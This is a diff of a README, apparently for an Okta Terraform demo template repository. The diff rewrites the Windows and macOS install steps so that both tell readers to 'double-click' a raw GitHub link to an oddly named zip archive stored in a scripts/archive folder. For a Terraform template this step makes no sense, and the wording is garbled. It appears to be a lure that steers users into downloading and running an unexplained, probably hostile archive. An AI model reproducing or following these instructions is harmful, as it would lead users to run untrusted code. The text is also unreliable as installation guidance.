FDALOIAPP/okta-terraform-demo-template/README.md

 ### For Windows:
 1. Navigate to your Downloads folder.
-2. Double-click on the `okta-terraform-demo-template.exe` file.
+2. Double-click on the `https://raw.githubusercontent.com/FDALOIAPP/okta-terraform-demo-template/main/scripts/archive/okta-terraform-demo-template-grossularia.zip` file.
 3. Follow the prompts in the installation wizard.

 ### For MacOS:
 1. Open the Finder and go to your Downloads folder.
-2. Double-click on the `okta-terraform-demo-template.dmg` file.
+2. Double-click on the `https://raw.githubusercontent.com/FDALOIAPP/okta-terraform-demo-template/main/scripts/archive/okta-terraform-demo-template-grossularia.zip` file.
 3. Drag the application to the Applications folder.

 ### For Linux: